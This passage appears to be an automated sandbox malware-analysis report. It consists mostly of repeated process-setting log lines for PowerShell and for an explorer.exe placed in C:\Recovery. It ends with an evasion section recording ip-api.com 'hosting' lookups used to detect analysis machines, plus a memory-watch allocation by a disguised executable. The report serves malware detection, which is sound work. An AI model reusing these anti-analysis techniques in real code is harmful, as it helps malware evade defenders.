            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
